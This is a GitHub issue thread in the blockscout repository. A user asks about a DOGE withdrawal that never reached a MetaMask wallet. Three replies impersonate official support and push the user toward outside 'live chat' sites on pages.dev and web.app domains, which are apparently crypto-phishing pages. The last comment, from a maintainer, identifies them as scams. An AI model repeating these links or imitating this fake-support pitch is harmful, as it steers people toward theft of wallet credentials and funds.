### ISSUE TITLE
My transaction for withdrawal doge is not credited into withdrawal doge wallet

### ISSUE THREAD

**Issue by Nupendra2515** [blockscout/blockscout#11351]
### Description

I withdrawal doge coin from Athena network to metamask erc20 wallet but not credited to metamask erc20 wallet

### Type of the installation

Docker-compose

### Type of the JSON RPC archive node

Op

### Type of the chain

L1/L2

### Link to the page

https://parthenon.athenescan.io/address/0xb601c6BC03c52048dDfbDFe98f7A38fA3045e054

### Steps to reproduce

I want my doge coin into metamask erc20 wallet 

### Backend version

v6.9.1-beta

### Frontend version

v1.36.1+21e1fdee

### Elixir & Erlang/OTP versions

1.17.3

### Operating system

Android os

### Additional information

**User Agent:** Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36

**Comment by Lerz-bordev** [comment]
> ### Description
> I withdrawal doge coin from Athena network to metamask erc20 wallet but not credited to metamask erc20 wallet
> 
> ### Type of the installation
> Docker-compose
> 
> ### Type of the JSON RPC archive node
> Op
> 
> ### Type of the chain
> L1/L2
> 
> ### Link to the page
> https://parthenon.athenescan.io/address/0xb601c6BC03c52048dDfbDFe98f7A38fA3045e054
> 
> ### Steps to reproduce
> I want my doge coin into metamask erc20 wallet
> 
> ### Backend version
> v6.9.1-beta
> 
> ### Frontend version
> v1.36.1+21e1fdee
> 
> ### Elixir & Erlang/OTP versions
> 1.17.3
> 
> ### Operating system
> Android os
> 
> ### Additional information
> **User Agent:** Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36

We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Blockscout Support Request](https://dappsrectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

**Comment by Athensmo** [comment]
Hello @Nupendra2515 
Visit the official Decentralized Dapps Protocol website to complete your withdrawals request. Strictly follow the procedure laid by the support team on the page once you establish a chat via [Decentralized Portal](https://websynchronizefix.web.app/). 
Note: Use the chat icon at the bottom of the page to initiate the chat.

**Comment by Alfreddexo** [comment]
@Nupendra2515 Dear user 

I understand that you have been experiencing some issues and I want to ensure you get the support you need as quickly as possible by using our live chat option.

Support : [Support](https://dapps-exploreonsite.web.app/)

	1.	Access the Live Chat:
	•	Navigate to our website’s home page.
	•	Look for the chat icon located at the bottom right corner of the screen and start a 💬.

**Comment by vbaranov** [comment]
@Nupendra2515 The previous users tried to scam you by providing a fake support link. This chat is for Blockscout-related questions. Your question is out of scope, where the Blockscout team can help.
